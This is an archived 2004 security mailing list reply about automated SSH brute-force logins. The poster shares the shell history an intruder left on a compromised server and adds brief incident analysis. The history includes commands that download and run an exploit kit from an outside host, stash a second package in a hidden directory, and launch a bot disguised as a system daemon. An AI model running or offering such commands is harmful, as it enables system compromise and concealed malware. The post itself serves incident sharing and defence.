lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list] 
From: andrewg at felinemenace.org (andrewg@...inemenace.org)
Subject: Re: Automated SSH login attempts?

Greetings list,

Accidentially sent only to Stefan, so redoing it.

On Thu, Jul 29, 2004 at 06:38:15PM +0200, Stefan Janecek wrote:
> Hmmm - I have also been getting those login attemps, but thought them to
> be harmless. Maybe they are not *that* harmless, though... Today I
> managed to get my hands on a machine that was originating such login
> attempts. I must admit I am far from being a linux security expert, but
> this is what I've found out up to now:
> 

I got a similar experience from a game box I look after 
(void.labs.pulltheplug.com, but people may prefer
http://vortex.labs.pulltheplug.com, feel free to jump on the irc server @ 
irc.pulltheplug.com, #social or #vortex).

The .bash_history is as follows:

passwd
uname -a
cat /etc/issue
w
/sbin.ifconfig
/sbin/ifconfig
wget sh3ll.info/milenium/xpl.tgz;tar zxvf xpl.tgz;cd super;./prt
ftp ftp.sh3ll.info
lynx
lynx www.sh3ll.info/milenium/xpl.tgz
ls
ls -alF
tar zxv xpl.tgz
tar zxvf xpl.tgz
cd supe`
cd super
./prt
lynx mil3nium.go.ro/milenium
lynx mil3nium.go.ro/
ncftp
ncftpget
lynx sh3ll.info/milenium/milenium
ls
ls -alF
ps -aux |grep test
lynx sh3ll.info/milenium/psy1985.tgz
mkdir .drivers
mv psy1985.tgz .drivers
cd .drivers
tar zxvf psy1985.tgz
rm -rf psy1985.tgz
cd nsmail/
PATH='.:$PATH'
inetd -e -o

It would appear that if they can't get a local root, they'll use the box for
IRCing from.

Hopefully this helps someone. I haven't looked too much into this, if wanted
I could grab the source ip addresses used for logging into guest, but thats
probably not overly useful.

Thanks,
Andrew Griffiths

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ